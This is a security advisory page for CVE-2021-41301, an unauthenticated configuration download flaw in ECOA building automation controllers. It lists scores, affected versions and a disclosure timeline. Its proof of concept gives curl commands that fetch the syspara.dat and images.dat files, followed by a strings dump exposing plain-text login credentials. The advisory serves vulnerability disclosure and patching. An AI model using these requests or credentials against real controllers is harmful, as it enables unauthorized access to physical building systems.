Lucene search

K
zeroscienceNeurogenesiaZSL-2021-5673
HistorySep 08, 2021 - 12:00 a.m.

ECOA Building Automation System Configuration Download Information Disclosure

2021-09-0800:00:00
Neurogenesia
zeroscience.mk
157

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

58.6%

Title: ECOA Building Automation System Configuration Download Information Disclosure
Advisory ID: ZSL-2021-5673
Type: Local/Remote
Impact: Security Bypass, Exposure of System Information, Exposure of Sensitive Information, System Access, DoS, Privilege Escalation
Risk: (5/5)
Release Date: 08.09.2021

Summary

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It’s like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Description

The BAS controller is vulnerable to configuration disclosure when direct object reference is made to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.

Vendor

ECOA Technologies Corp. - <http://www.ecoa.com.tw>

Affected Version

ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator

Tested On

EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628

Vendor Status

[25.06.2021] Vulnerability discovered.
[27.06.2021] Vendor contacted.
[01.07.2021] No response from the vendor.
[02.07.2021] TWCERT/CC contacted.
[05.07.2021] TWCERT/CC responds. Working with TWCERT/CC.
[19.08.2021] Vendor releases patch to address some of the issues.
[08.09.2021] Public security advisory released.

PoC

ecoa_configbackup.txt

Credits

Vulnerability discovered by Neurogenesia - <[email protected]>

References

[1] ECOA Information Security Update
[2] <https://www.exploit-db.com/exploits/50280&gt;
[3] <https://packetstormsecurity.com/files/164110&gt;
[4] <https://cxsecurity.com/issue/WLB-2021090082&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/209108&gt;
[6] <https://www.twcert.org.tw/en/cp-139-5150-5e56a-2.html&gt;
[7] <https://vulners.com/cve/CVE-2021-41301&gt;
[8] <https://nvd.nist.gov/vuln/detail/CVE-2021-41301&gt;

Changelog

[08.09.2021] - Initial release
[19.09.2021] - Added reference [2], [3], [4] and [5]
[30.09.2021] - Added reference [6], [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>ECOA Building Automation System Configuration Download Information Disclosure


Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.

Desc:
The BAS controller is vulnerable to configuration disclosure when direct object reference is made
to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to
disclose sensitive information and help her in authentication bypass, privilege escalation and full
system access.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628


Vulnerability discovered by Neurogenesia
                            @zeroscience


Advisory ID: ZSL-2021-5673
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php


25.06.2021

--


Configuration / Backup Download / Privilege Escalation / Password Disclosure
----------------------------------------------------------------------------

- Unauthenticated config download reveals plain-text passwords

$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat
$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat
$ strings *
...
...
/opt/webpage/pwsd.bin
/user
user
embed
power
1234
1234
/opt/webpage/system.bin
Oboothr=24
bootmin=00
OutIDWork=Y
language=big5
seclanguage=Y
ValSet=Y
allpollTm=500
httpusr=embed
httppwd=power
...
...
</p></body></html>

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

58.6%

Related for ZSL-2021-5673